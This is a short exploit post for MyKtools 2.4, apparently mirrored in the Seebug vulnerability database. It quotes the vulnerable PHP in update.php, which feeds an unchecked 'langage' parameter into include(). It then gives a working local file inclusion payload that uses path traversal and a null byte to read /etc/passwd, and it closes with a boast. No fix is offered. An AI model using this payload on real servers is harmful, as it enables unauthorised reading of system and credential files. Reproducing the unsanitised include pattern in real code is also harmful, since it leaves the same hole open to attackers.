MyKtools 2.4 (langage) Local File Inclusion Vulnerability

2008-10-28T00:00:00
ID SSV:9823
Type seebug
Reporter Root
Modified 2008-10-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##############
# Autor: x0r
#
# Email: evolutionteam.x0[at]gmail[dot]com
#
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
#
# Bug: LFI
##############

Bug:

In \update.php

// Include du fichier langue
if ($_GET['langage'])
{
$langue = $_GET['langage'];
include ("lang/".$langue.".php");
}

Exploit: \update.php?langage=../../../../../../etc/passwd%00

p0wn3d Beby.

-=EOF=-